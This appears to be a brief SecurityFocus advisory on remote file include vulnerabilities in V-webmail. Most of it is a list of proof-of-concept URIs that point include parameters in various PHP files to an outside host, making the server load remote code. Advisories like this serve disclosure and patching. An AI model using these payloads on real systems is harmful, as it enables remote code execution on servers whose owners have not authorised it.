V-webmail Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues using a browser.

The following proof-of-concept URIs are available:

http://www.example.com/path/includes/pear/Mail/RFC822.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Net/POP3.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Net/Socket.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/XML/Parser.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/XML/Tree.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Console/Getopt.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/System.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/Log.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/pear/File.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/prepend.php?CONFIG[includes]=http://www.example2.com
http://www.example.com/path/includes/prepend.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/path/includes/email.list.search.php?CONFIG[includes]=http://www.example2.com
http://www.example.com/path/includes/cachedConfig.php?CONFIG[pear_dir]=http://www.example2.com


 

Copyright 2010, SecurityFocus